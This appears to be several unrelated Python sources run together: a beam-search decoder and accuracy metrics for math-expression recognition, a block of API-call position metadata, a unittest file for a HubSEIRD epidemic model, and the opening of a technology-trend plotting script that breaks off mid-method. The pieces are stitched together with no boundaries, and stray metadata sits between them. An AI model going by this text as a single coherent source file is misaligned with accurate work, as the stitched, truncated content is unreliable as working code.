        # next_ctPC = torch.reshape(next_ctPC, (-1, next_ctP.shape[1]))
        ctxC = ctx0.repeat(live_k * rpos_beam, 1, 1, 1)
        next_ctPC = torch.zeros(next_ctP.shape[0] * rpos_beam, next_ctP.shape[1]).cuda()
        next_h01C = torch.zeros(next_h01.shape[0] * rpos_beam, next_h01.shape[1]).cuda()
        next_calpha_pastC = torch.zeros(next_calpha_past.shape[0] * rpos_beam, next_calpha_past.shape[1], next_calpha_past.shape[2]).cuda()
        for bidx in range(next_calpha_past.shape[0]):
            for ridx in range(rpos_beam):
                next_ctPC[bidx * rpos_beam + ridx] = next_ctP[bidx]
                next_h01C[bidx * rpos_beam + ridx] = next_h01[bidx]
                next_calpha_pastC[bidx * rpos_beam + ridx] = next_calpha_past[bidx]
        next_remb = torch.from_numpy(next_remb).cuda()
        # --- child step: score the vocabulary for every (path, parent) pair ---
        next_lp, next_rep, next_state, next_h1t, next_ca, next_calpha_past, next_re = \
            model.f_next_child(params, next_remb, next_ctPC, ctxC, next_h01C, next_calpha_pastC)
        next_lp = next_lp.cpu().numpy()
        next_state = next_state.cpu().numpy()
        next_h1t = next_h1t.cpu().numpy()
        next_calpha_past = next_calpha_past.cpu().numpy()
        next_re = next_re.cpu().numpy()
        # Combine path scores with child and parent log-probabilities.
        hyp_scores = np.tile(hyp_scores[:, None], [1, rpos_beam]).flatten()
        cand_scores = hyp_scores[:, None] - np.log(next_lp + 1e-10) - np.log(rpos_scores + 1e-10)[:, None]
        cand_flat = cand_scores.flatten()
        ranks_flat = cand_flat.argsort()[:(k - dead_k)]
        voc_size = next_lp.shape[1]
        trans_indices = ranks_flat // voc_size            # expanded (path, parent) index
        trans_indicesP = ranks_flat // (voc_size * rpos_beam)  # original path index
        word_indices = ranks_flat % voc_size
        costs = cand_flat[ranks_flat]
        # update paths
        new_hyp_samples = []
        new_hyp_scores = np.zeros(k - dead_k).astype('float32')
        new_hyp_rpos_samples = []
        new_hyp_relation_samples = []
        new_hyp_states = []
        new_hyp_h1ts = []
        new_hyp_calpha_past = []
        new_hyp_palpha_past = []
        new_hyp_emb_memory = []
        new_hyp_ePmb_memory = []
        for idx, [ti, wi, tPi] in enumerate(zip(trans_indices, word_indices, trans_indicesP)):
            new_hyp_samples.append(hyp_samples[tPi] + [wi])
            new_hyp_scores[idx] = copy.copy(costs[idx])
            new_hyp_rpos_samples.append(hyp_rpos_samples[tPi] + [next_rpos.flatten()[ti]])
            new_hyp_relation_samples.append(hyp_relation_samples[tPi] + [next_re[ti]])
            new_hyp_states.append(copy.copy(next_state[ti]))
            new_hyp_h1ts.append(copy.copy(next_h1t[ti]))
            new_hyp_calpha_past.append(copy.copy(next_calpha_past[ti]))
            new_hyp_palpha_past.append(copy.copy(next_palpha_past[tPi]))
            new_hyp_emb_memory.append(copy.copy(nextemb_memory[tPi]))
            new_hyp_ePmb_memory.append(copy.copy(nextePmb_memory[tPi]))
        # check the finished samples
        new_live_k = 0
        hyp_samples = []
        hyp_scores = []
        hyp_rpos_samples = []
        hyp_relation_samples = []
        hyp_states = []
        hyp_h1ts = []
        hyp_calpha_past = []
        hyp_palpha_past = []
        hyp_emb_memory = []
        hyp_ePmb_memory = []
        for idx in range(len(new_hyp_samples)):
            if new_hyp_samples[idx][-1] == 0:  # <eol>
                # Path finished: retire it from the beam.
                sample_score.append(new_hyp_scores[idx])
                sample.append(new_hyp_samples[idx])
                rpos_sample.append(new_hyp_rpos_samples[idx])
                relation_sample.append(new_hyp_relation_samples[idx])
                dead_k += 1
            else:
                new_live_k += 1
                hyp_scores.append(new_hyp_scores[idx])
                hyp_samples.append(new_hyp_samples[idx])
                hyp_rpos_samples.append(new_hyp_rpos_samples[idx])
                hyp_relation_samples.append(new_hyp_relation_samples[idx])
                hyp_states.append(new_hyp_states[idx])
                hyp_h1ts.append(new_hyp_h1ts[idx])
                hyp_calpha_past.append(new_hyp_calpha_past[idx])
                hyp_palpha_past.append(new_hyp_palpha_past[idx])
                hyp_emb_memory.append(new_hyp_emb_memory[idx])
                hyp_ePmb_memory.append(new_hyp_ePmb_memory[idx])
        hyp_scores = np.array(hyp_scores)
        live_k = new_live_k
        # whether finish beam search
        if new_live_k < 1:
            break
        if dead_k >= k:
            break
        # Re-pack the surviving paths as tensors for the next step.
        next_lw = np.array([w[-1] for w in hyp_samples])  # each path's final symbol, (live_k,)
        next_state = np.array(hyp_states)  # h2t, (live_k,n)
        next_h1t = np.array(hyp_h1ts)
        next_calpha_past = np.array(hyp_calpha_past)  # (live_k,H,W)
        next_palpha_past = np.array(hyp_palpha_past)
        nextemb_memory = np.array(hyp_emb_memory)
        nextemb_memory = np.transpose(nextemb_memory, (1, 0, 2))
        nextePmb_memory = np.array(hyp_ePmb_memory)
        nextePmb_memory = np.transpose(nextePmb_memory, (1, 0, 2))
        next_lw = torch.from_numpy(next_lw).cuda()
        next_state = torch.from_numpy(next_state).cuda()
        next_h1t = torch.from_numpy(next_h1t).cuda()
        next_calpha_past = torch.from_numpy(next_calpha_past).cuda()
        next_palpha_past = torch.from_numpy(next_palpha_past).cuda()
        nextemb_memory = torch.from_numpy(nextemb_memory).cuda()
        nextePmb_memory = torch.from_numpy(nextePmb_memory).cuda()
    return sample_score, sample, rpos_sample, relation_sample
# init model params
def weight_init(m):
    """Initialize a module's parameters in place (for use with ``model.apply``).

    Conv2d and Linear layers get Xavier-uniform weights and zero biases;
    every other module type is left untouched.

    The previous version wrapped the bias initialization in a bare
    ``except:``, which silently swallowed *every* exception (including
    KeyboardInterrupt); testing ``m.bias is not None`` handles the only
    expected failure mode (layers constructed with ``bias=False``) explicitly.
    """
    if isinstance(m, (nn.Conv2d, nn.Linear)):
        nn.init.xavier_uniform_(m.weight.data)
        if m.bias is not None:
            nn.init.constant_(m.bias.data, 0.)
# compute metric
def cmp_result(rec, label):
    """Levenshtein (edit) distance between a recognized sequence and its label.

    Returns the pair ``(distance, len(label))`` so that callers can
    accumulate a word error rate.
    """
    n_lab, n_rec = len(label), len(rec)
    dp = np.zeros((n_lab + 1, n_rec + 1), dtype='int32')
    # Base cases: transforming to/from the empty prefix costs its length.
    dp[0, :] = np.arange(n_rec + 1)
    dp[:, 0] = np.arange(n_lab + 1)
    for i in range(1, n_lab + 1):
        for j in range(1, n_rec + 1):
            substitute = dp[i - 1, j - 1] + (label[i - 1] != rec[j - 1])
            insert = dp[i, j - 1] + 1
            delete = dp[i - 1, j] + 1
            dp[i, j] = min(substitute, insert, delete)
    return dp[n_lab, n_rec], n_lab
def compute_wer(rec_mat, label_mat):
    """Word error rate and sentence accuracy over a batch of recognitions.

    Both arguments are dicts keyed by sample id; ``label_mat`` must contain
    every key of ``rec_mat``.  Returns ``(wer, sacc)``.
    """
    total_dist = 0
    total_label = 0
    total_line = 0
    total_line_rec = 0
    for key in rec_mat:
        dist, label_len = cmp_result(rec_mat[key], label_mat[key])
        total_dist += dist
        total_label += label_len
        total_line += 1
        if dist == 0:  # exact match counts toward sentence accuracy
            total_line_rec += 1
    wer = float(total_dist) / total_label
    sacc = float(total_line_rec) / total_line
    return wer, sacc
def cmp_sacc_result(rec_list, label_list, rec_ridx_list, label_ridx_list,
                    rec_re_list, label_re_list, chdict, redict):
    """Exact structure match between one predicted tree and its ground truth.

    A sample is correct only if every symbol, parent position, and relation
    agrees (after normalizing Above/Below to Sup/Sub under \lim, \int and
    \sum parents).  Returns True on an exact match, False otherwise.
    """
    # Position -> symbol maps, with position 0 reserved for the start token.
    out_sym_pdict = {'0': '<s>'}
    label_sym_pdict = {'0': '<s>'}
    for idx, sym in enumerate(rec_list):
        out_sym_pdict[str(idx + 1)] = chdict[sym]
    for idx, sym in enumerate(label_list):
        label_sym_pdict[str(idx + 1)] = chdict[sym]
    if len(rec_list) != len(label_list):
        return False
    for idx in range(len(rec_list)):
        out_sym = chdict[rec_list[idx]]
        label_sym = chdict[label_list[idx]]
        out_repos = int(rec_ridx_list[idx])
        label_repos = int(label_ridx_list[idx])
        out_re = redict[rec_re_list[idx]]
        label_re = redict[label_re_list[idx]]
        # NOTE(review): out_repos/label_repos are ints while the pdict keys
        # are strings, so these lookups appear to always fall through to
        # 'unknown' — confirm whether that is intended.
        if out_repos in out_sym_pdict:
            out_resym_s = out_sym_pdict[out_repos]
        else:
            out_resym_s = 'unknown'
        if label_repos in label_sym_pdict:
            label_resym_s = label_sym_pdict[label_repos]
        else:
            label_resym_s = 'unknown'
        # post-processing only for math recognition: under big operators,
        # Above/Below are interchangeable with Sup/Sub.
        if out_resym_s == label_resym_s and out_resym_s in ('\lim', '\int', '\sum'):
            if out_re == 'Above':
                out_re = 'Sup'
            if out_re == 'Below':
                out_re = 'Sub'
            if label_re == 'Above':
                label_re = 'Sup'
            if label_re == 'Below':
                label_re = 'Sub'
        if out_sym != label_sym or out_repos != label_repos or out_re != label_re:
            return False
    return True
def compute_sacc(rec_mat, label_mat, rec_ridx_mat, label_ridx_mat,
                 rec_re_mat, label_re_mat, chdict, redict):
    """Structure accuracy: fraction of samples whose predicted tree matches
    the label tree exactly (symbols, parent positions, and relations).

    All six *_mat arguments are dicts keyed by sample id.
    """
    correct_num = 0
    for key in rec_mat:
        matched = cmp_sacc_result(rec_mat[key], label_mat[key],
                                  rec_ridx_mat[key], label_ridx_mat[key],
                                  rec_re_mat[key], label_re_mat[key],
                                  chdict, redict)
        if matched:
            correct_num += 1
    return 1. * correct_num / len(rec_mat)
| [
"torch.ones",
"numpy.log",
"random.shuffle",
"torch.nn.init.xavier_uniform_",
"numpy.transpose",
"numpy.zeros",
"copy.copy",
"numpy.max",
"pickle.load",
"numpy.array",
"torch.nn.init.constant_",
"numpy.tile",
"numpy.arange",
"torch.zeros",
"sys.exit",
"torch.from_numpy"
] | [((6755, 6772), 'numpy.max', 'np.max', (['heights_x'], {}), '(heights_x)\n', (6761, 6772), True, 'import numpy as np\n'), ((6791, 6807), 'numpy.max', 'np.max', (['widths_x'], {}), '(widths_x)\n', (6797, 6807), True, 'import numpy as np\n'), ((6824, 6842), 'numpy.max', 'np.max', (['lengths_ly'], {}), '(lengths_ly)\n', (6830, 6842), True, 'import numpy as np\n'), ((6859, 6877), 'numpy.max', 'np.max', (['lengths_ry'], {}), '(lengths_ry)\n', (6865, 6877), True, 'import numpy as np\n'), ((1017, 1033), 'pickle.load', 'pkl.load', (['fp_fea'], {}), '(fp_fea)\n', (1025, 1033), True, 'import pickle as pkl\n'), ((10514, 10553), 'numpy.transpose', 'np.transpose', (['nextemb_memory', '(1, 0, 2)'], {}), '(nextemb_memory, (1, 0, 2))\n', (10526, 10553), True, 'import numpy as np\n'), ((10601, 10641), 'numpy.transpose', 'np.transpose', (['nextePmb_memory', '(1, 0, 2)'], {}), '(nextePmb_memory, (1, 0, 2))\n', (10613, 10641), True, 'import numpy as np\n'), ((15534, 15554), 'numpy.array', 'np.array', (['hyp_scores'], {}), '(hyp_scores)\n', (15542, 15554), True, 'import numpy as np\n'), ((15727, 15765), 'numpy.array', 'np.array', (['[w[-1] for w in hyp_samples]'], {}), '([w[-1] for w in hyp_samples])\n', (15735, 15765), True, 'import numpy as np\n'), ((15826, 15846), 'numpy.array', 'np.array', (['hyp_states'], {}), '(hyp_states)\n', (15834, 15846), True, 'import numpy as np\n'), ((15885, 15903), 'numpy.array', 'np.array', (['hyp_h1ts'], {}), '(hyp_h1ts)\n', (15893, 15903), True, 'import numpy as np\n'), ((15931, 15956), 'numpy.array', 'np.array', (['hyp_calpha_past'], {}), '(hyp_calpha_past)\n', (15939, 15956), True, 'import numpy as np\n'), ((16000, 16025), 'numpy.array', 'np.array', (['hyp_palpha_past'], {}), '(hyp_palpha_past)\n', (16008, 16025), True, 'import numpy as np\n'), ((16051, 16075), 'numpy.array', 'np.array', (['hyp_emb_memory'], {}), '(hyp_emb_memory)\n', (16059, 16075), True, 'import numpy as np\n'), ((16101, 16140), 'numpy.transpose', 'np.transpose', 
(['nextemb_memory', '(1, 0, 2)'], {}), '(nextemb_memory, (1, 0, 2))\n', (16113, 16140), True, 'import numpy as np\n'), ((16167, 16192), 'numpy.array', 'np.array', (['hyp_ePmb_memory'], {}), '(hyp_ePmb_memory)\n', (16175, 16192), True, 'import numpy as np\n'), ((16219, 16259), 'numpy.transpose', 'np.transpose', (['nextePmb_memory', '(1, 0, 2)'], {}), '(nextePmb_memory, (1, 0, 2))\n', (16231, 16259), True, 'import numpy as np\n'), ((16837, 16875), 'torch.nn.init.xavier_uniform_', 'nn.init.xavier_uniform_', (['m.weight.data'], {}), '(m.weight.data)\n', (16860, 16875), False, 'from torch import nn\n'), ((17011, 17049), 'torch.nn.init.xavier_uniform_', 'nn.init.xavier_uniform_', (['m.weight.data'], {}), '(m.weight.data)\n', (17034, 17049), False, 'from torch import nn\n'), ((5058, 5080), 'random.shuffle', 'random.shuffle', (['bucket'], {}), '(bucket)\n', (5072, 5080), False, 'import random\n'), ((6887, 6961), 'numpy.zeros', 'np.zeros', (["(n_samples, params['input_channels'], max_height_x, max_width_x)"], {}), "((n_samples, params['input_channels'], max_height_x, max_width_x))\n", (6895, 6961), True, 'import numpy as np\n'), ((6990, 7022), 'numpy.zeros', 'np.zeros', (['(maxlen_ly, n_samples)'], {}), '((maxlen_ly, n_samples))\n', (6998, 7022), True, 'import numpy as np\n'), ((7080, 7112), 'numpy.zeros', 'np.zeros', (['(maxlen_ry, n_samples)'], {}), '((maxlen_ry, n_samples))\n', (7088, 7112), True, 'import numpy as np\n'), ((7139, 7171), 'numpy.zeros', 'np.zeros', (['(maxlen_ly, n_samples)'], {}), '((maxlen_ly, n_samples))\n', (7147, 7171), True, 'import numpy as np\n'), ((7198, 7241), 'numpy.zeros', 'np.zeros', (['(n_samples, maxlen_ly, maxlen_ly)'], {}), '((n_samples, maxlen_ly, maxlen_ly))\n', (7206, 7241), True, 'import numpy as np\n'), ((7268, 7300), 'numpy.zeros', 'np.zeros', (['(maxlen_ly, n_samples)'], {}), '((maxlen_ly, n_samples))\n', (7276, 7300), True, 'import numpy as np\n'), ((7327, 7359), 'numpy.zeros', 'np.zeros', (['(maxlen_ry, n_samples)'], {}), 
'((maxlen_ry, n_samples))\n', (7335, 7359), True, 'import numpy as np\n'), ((7391, 7439), 'numpy.zeros', 'np.zeros', (['(n_samples, max_height_x, max_width_x)'], {}), '((n_samples, max_height_x, max_width_x))\n', (7399, 7439), True, 'import numpy as np\n'), ((7473, 7505), 'numpy.zeros', 'np.zeros', (['(maxlen_ly, n_samples)'], {}), '((maxlen_ly, n_samples))\n', (7481, 7505), True, 'import numpy as np\n'), ((7539, 7571), 'numpy.zeros', 'np.zeros', (['(maxlen_ry, n_samples)'], {}), '((maxlen_ry, n_samples))\n', (7547, 7571), True, 'import numpy as np\n'), ((7605, 7637), 'numpy.zeros', 'np.zeros', (['(maxlen_ly, n_samples)'], {}), '((maxlen_ly, n_samples))\n', (7613, 7637), True, 'import numpy as np\n'), ((7671, 7714), 'numpy.zeros', 'np.zeros', (['(n_samples, maxlen_ly, maxlen_ly)'], {}), '((n_samples, maxlen_ly, maxlen_ly))\n', (7679, 7714), True, 'import numpy as np\n'), ((9156, 9172), 'numpy.zeros', 'np.zeros', (['live_k'], {}), '(live_k)\n', (9164, 9172), True, 'import numpy as np\n'), ((9517, 9561), 'torch.zeros', 'torch.zeros', (['(1)', 'ctx0.shape[2]', 'ctx0.shape[3]'], {}), '(1, ctx0.shape[2], ctx0.shape[3])\n', (9528, 9561), False, 'import torch\n'), ((9608, 9652), 'torch.zeros', 'torch.zeros', (['(1)', 'ctx0.shape[2]', 'ctx0.shape[3]'], {}), '(1, ctx0.shape[2], ctx0.shape[3])\n', (9619, 9652), False, 'import torch\n'), ((9681, 9731), 'torch.zeros', 'torch.zeros', (["params['maxlen']", 'live_k', "params['m']"], {}), "(params['maxlen'], live_k, params['m'])\n", (9692, 9731), False, 'import torch\n'), ((9761, 9811), 'torch.zeros', 'torch.zeros', (["params['maxlen']", 'live_k', "params['m']"], {}), "(params['maxlen'], live_k, params['m'])\n", (9772, 9811), False, 'import torch\n'), ((13513, 13534), 'copy.copy', 'copy.copy', (['costs[idx]'], {}), '(costs[idx])\n', (13522, 13534), False, 'import copy\n'), ((16901, 16936), 'torch.nn.init.constant_', 'nn.init.constant_', (['m.bias.data', '(0.0)'], {}), '(m.bias.data, 0.0)\n', (16918, 16936), False, 'from torch 
import nn\n'), ((17075, 17110), 'torch.nn.init.constant_', 'nn.init.constant_', (['m.bias.data', '(0.0)'], {}), '(m.bias.data, 0.0)\n', (17092, 17110), False, 'from torch import nn\n'), ((9454, 9486), 'torch.ones', 'torch.ones', (['(1)'], {'dtype': 'torch.int64'}), '(1, dtype=torch.int64)\n', (9464, 9486), False, 'import torch\n'), ((11373, 11434), 'torch.zeros', 'torch.zeros', (['(next_ctP.shape[0] * rpos_beam)', 'next_ctP.shape[1]'], {}), '(next_ctP.shape[0] * rpos_beam, next_ctP.shape[1])\n', (11384, 11434), False, 'import torch\n'), ((11460, 11521), 'torch.zeros', 'torch.zeros', (['(next_h01.shape[0] * rpos_beam)', 'next_h01.shape[1]'], {}), '(next_h01.shape[0] * rpos_beam, next_h01.shape[1])\n', (11471, 11521), False, 'import torch\n'), ((11555, 11664), 'torch.zeros', 'torch.zeros', (['(next_calpha_past.shape[0] * rpos_beam)', 'next_calpha_past.shape[1]', 'next_calpha_past.shape[2]'], {}), '(next_calpha_past.shape[0] * rpos_beam, next_calpha_past.shape[1\n ], next_calpha_past.shape[2])\n', (11566, 11664), False, 'import torch\n'), ((11989, 12016), 'torch.from_numpy', 'torch.from_numpy', (['next_remb'], {}), '(next_remb)\n', (12005, 12016), False, 'import torch\n'), ((12467, 12511), 'numpy.tile', 'np.tile', (['hyp_scores[:, None]', '[1, rpos_beam]'], {}), '(hyp_scores[:, None], [1, rpos_beam])\n', (12474, 12511), True, 'import numpy as np\n'), ((12566, 12589), 'numpy.log', 'np.log', (['(next_lp + 1e-10)'], {}), '(next_lp + 1e-10)\n', (12572, 12589), True, 'import numpy as np\n'), ((12589, 12616), 'numpy.log', 'np.log', (['(rpos_scores + 1e-10)'], {}), '(rpos_scores + 1e-10)\n', (12595, 12616), True, 'import numpy as np\n'), ((13023, 13043), 'numpy.zeros', 'np.zeros', (['(k - dead_k)'], {}), '(k - dead_k)\n', (13031, 13043), True, 'import numpy as np\n'), ((13743, 13768), 'copy.copy', 'copy.copy', (['next_state[ti]'], {}), '(next_state[ti])\n', (13752, 13768), False, 'import copy\n'), ((13802, 13825), 'copy.copy', 'copy.copy', (['next_h1t[ti]'], {}), 
'(next_h1t[ti])\n', (13811, 13825), False, 'import copy\n'), ((13866, 13897), 'copy.copy', 'copy.copy', (['next_calpha_past[ti]'], {}), '(next_calpha_past[ti])\n', (13875, 13897), False, 'import copy\n'), ((13938, 13970), 'copy.copy', 'copy.copy', (['next_palpha_past[tPi]'], {}), '(next_palpha_past[tPi])\n', (13947, 13970), False, 'import copy\n'), ((14010, 14040), 'copy.copy', 'copy.copy', (['nextemb_memory[tPi]'], {}), '(nextemb_memory[tPi])\n', (14019, 14040), False, 'import copy\n'), ((14081, 14112), 'copy.copy', 'copy.copy', (['nextePmb_memory[tPi]'], {}), '(nextePmb_memory[tPi])\n', (14090, 14112), False, 'import copy\n'), ((16278, 16303), 'torch.from_numpy', 'torch.from_numpy', (['next_lw'], {}), '(next_lw)\n', (16294, 16303), False, 'import torch\n'), ((16332, 16360), 'torch.from_numpy', 'torch.from_numpy', (['next_state'], {}), '(next_state)\n', (16348, 16360), False, 'import torch\n'), ((16387, 16413), 'torch.from_numpy', 'torch.from_numpy', (['next_h1t'], {}), '(next_h1t)\n', (16403, 16413), False, 'import torch\n'), ((16448, 16482), 'torch.from_numpy', 'torch.from_numpy', (['next_calpha_past'], {}), '(next_calpha_past)\n', (16464, 16482), False, 'import torch\n'), ((16517, 16551), 'torch.from_numpy', 'torch.from_numpy', (['next_palpha_past'], {}), '(next_palpha_past)\n', (16533, 16551), False, 'import torch\n'), ((16584, 16616), 'torch.from_numpy', 'torch.from_numpy', (['nextemb_memory'], {}), '(nextemb_memory)\n', (16600, 16616), False, 'import torch\n'), ((16650, 16683), 'torch.from_numpy', 'torch.from_numpy', (['nextePmb_memory'], {}), '(nextePmb_memory)\n', (16666, 16683), False, 'import torch\n'), ((1566, 1576), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1574, 1576), False, 'import sys\n'), ((9940, 9977), 'torch.ones', 'torch.ones', (['live_k'], {'dtype': 'torch.int64'}), '(live_k, dtype=torch.int64)\n', (9950, 9977), False, 'import torch\n'), ((10872, 10890), 'numpy.arange', 'np.arange', (['n_batch'], {}), '(n_batch)\n', (10881, 10890), True, 
'import numpy as np\n')] |
import numpy as np
import pandas as pd
import unittest
from Eir.DTMC.spatialModel.Hub.HubSEIRD import HubSEIRD
import Eir.exceptions as e
# keep this seed when running test so that outputs can be checked
np.random.seed(7363817)  # deterministic RNG so the stored HubSEIRD.csv comparison is reproducible
class Test_HubSEIRD(unittest.TestCase):
    """Regression and input-validation checks for the Hub SEIRD spatial model.

    NOTE(review): __init__ overrides unittest.TestCase.__init__ without
    calling super(), so this class is driven manually from __main__
    (see bottom of file) rather than through unittest discovery.
    """

    def __init__(self):
        # Fixed-parameter simulation; reproducible thanks to the module-level seed.
        self.test = HubSEIRD(S0=999, E0=1, I0=1, R0=0, pss=.23, rho=.2, gamma=.15, mu=.2, side=25, rstart=3, days=31, w0=.73, alpha=2)
        self.sdetails = self.test.run()

    def generateCSV(self):
        """ How CSV was generated in order to ensure reproducibility."""
        df = self.test.toDataFrame()
        df.to_csv("HubSEIRD.csv", index=False)

    def checkOutputs(self):
        # Regression check: the current run must reproduce the stored CSV exactly.
        df = self.test.toDataFrame()
        df2 = pd.read_csv("HubSEIRD.csv")
        assert df.equals(df2)
        print("Outputs test passed")

    def checkSimulInputs(self):
        # Simul_Details accessors must reject malformed person ids and day indices.
        # checks for invalid person inputs
        self.assertRaises(e.NotIntException, self.sdetails.personHistory, 100.0)
        self.assertRaises(e.PersonNotFound, self.sdetails.personHistory, 1001)
        # checks for exceptions when inputting days
        self.assertRaises(e.DayOutOfRange, self.sdetails.transmissionHistoryOnDay, 65)
        self.assertRaises(e.DayOutOfRange, self.sdetails.transmissionHistoryOnDay, -1)
        self.assertRaises(e.NotIntException, self.sdetails.transmissionHistoryOnDay, 25.0)
        print("Simul_Details input test passed: throws error for invalid inputs")

    def checkInput(self):
        # The HubSEIRD constructor must validate types, signs, and probability ranges.
        # checks for int exception
        self.assertRaises(e.NotIntException, HubSEIRD, 999.0, 1, 1, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NotIntException, HubSEIRD, 999, 1.0, 1, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NotIntException, HubSEIRD, 999, 1, 1.0, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NotIntException, HubSEIRD, 999, 1, 1, 0.0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NotIntException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, 25, 3, 31.0, 1.0, 6**0.5, 2)
        # checks for not float exception
        self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, '.23', .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, .23, True, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, .23, .2, 'apples', .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, False, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, 25, '0', 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, True, 2)
        self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, '2')
        self.assertRaises(e.NotFloatException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, '.2', 25, 3, 31, 1.0, 6**0.5, 2)
        # checks for negative values
        self.assertRaises(e.NegativeValException, HubSEIRD, -999, 1, 1, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NegativeValException, HubSEIRD, 999, -1, 1, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, -1, 0, .23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, 1, 0, -.23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, 1, 0, .23, -.2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, 1, 0, .23, .2, -.15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, -25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, 1, 0, .23, .2, -.15, .2, 25, 3, 31, 1.0, -6**0.5, 2)
        self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, 25, 3, 31, -1.0, 6**0.5, 2)
        self.assertRaises(e.NegativeValException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, -.2, 25, 3, 31, 1.0, 6**0.5, 2)
        # checks probability
        self.assertRaises(e.ProbabilityException, HubSEIRD, 999, 1, 1, 0, .23, .2, 1.15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.ProbabilityException, HubSEIRD, 999, 1, 1, 0, .23, 1.2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.ProbabilityException, HubSEIRD, 999, 1, 1, 0, 1.23, .2, .15, .2, 25, 3, 31, 1.0, 6**0.5, 2)
        self.assertRaises(e.ProbabilityException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, .2, 25, 3, 31, 1.1, 6**0.5, 2)
        self.assertRaises(e.ProbabilityException, HubSEIRD, 999, 1, 1, 0, .23, .2, .15, 1.2, 25, 3, 31, 1.0, 6**0.5, 2)
        print("Input Test Passed")
if __name__ == '__main__':
    # Run the checks manually; the class is not executed through unittest
    # discovery (its __init__ does not follow the TestCase protocol).
    a = Test_HubSEIRD()
    #a.generateCSV()
    a.checkOutputs()
    a.checkSimulInputs()
    a.checkInput()
| [
"pandas.read_csv",
"numpy.random.seed",
"Eir.DTMC.spatialModel.Hub.HubSEIRD.HubSEIRD"
] | [((205, 228), 'numpy.random.seed', 'np.random.seed', (['(7363817)'], {}), '(7363817)\n', (219, 228), True, 'import numpy as np\n'), ((319, 442), 'Eir.DTMC.spatialModel.Hub.HubSEIRD.HubSEIRD', 'HubSEIRD', ([], {'S0': '(999)', 'E0': '(1)', 'I0': '(1)', 'R0': '(0)', 'pss': '(0.23)', 'rho': '(0.2)', 'gamma': '(0.15)', 'mu': '(0.2)', 'side': '(25)', 'rstart': '(3)', 'days': '(31)', 'w0': '(0.73)', 'alpha': '(2)'}), '(S0=999, E0=1, I0=1, R0=0, pss=0.23, rho=0.2, gamma=0.15, mu=0.2,\n side=25, rstart=3, days=31, w0=0.73, alpha=2)\n', (327, 442), False, 'from Eir.DTMC.spatialModel.Hub.HubSEIRD import HubSEIRD\n'), ((747, 774), 'pandas.read_csv', 'pd.read_csv', (['"""HubSEIRD.csv"""'], {}), "('HubSEIRD.csv')\n", (758, 774), True, 'import pandas as pd\n')] |
#!/usr/bin/env python
"""Graphs the progress of various technologies."""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
__author__ = "<NAME>"
import os
import numpy as np
import pylab as plt
import matplotlib.ticker as ticker
from astropy.table import Table
from astropy import log
###########
# Constants
###########
DATADIR = "data"   # directory holding one sub-folder per dataset
RED = "#e74c3c"    # scatter-point color
BLUE = "#2c3e50"   # trend-line color
#########
# Classes
#########
class DataSet(object):
    """Base class for a dataset that grows (roughly) exponentially over time.

    Subclasses define ``prefix`` (the CSV sub-directory and file name),
    ``xcolumn``/``ycolumn`` (table columns), ``xlabel``/``ylabel``/``title``,
    and optionally ``labelcolumn``, ``xlim`` and ``ylim``.  Because the
    y-data is assumed exponential, trends are fit as straight lines in
    log10 space.

    Changes vs. the previous revision: ``== None`` replaced with ``is None``
    (PEP 8 / E711), an unused local and a dead triple-quoted block removed,
    and the duplicated title branches merged.
    """

    labelcolumn = None       # optional column holding per-point labels
    xlim, ylim = None, None  # optional axis limits

    def __init__(self, filename=None):
        """Read the data table and extract the x/y columns.

        Parameters
        ----------
        filename : str, optional
            Path to the CSV file; defaults to ``data/<prefix>/<prefix>.csv``.
        """
        if filename is None:
            filename = os.path.join(DATADIR, self.prefix, self.prefix + '.csv')
        self.table = Table.read(filename, format='ascii')
        self.xdata = self.table[self.xcolumn]
        self.ydata = self.table[self.ycolumn]

    def trendfit(self):
        """Fit the exponential trend; returns (slope, intercept) of log10(y) vs x."""
        return np.polyfit(self.xdata, np.log10(self.ydata), 1)

    def plot(self, trendfit=True, title=True):
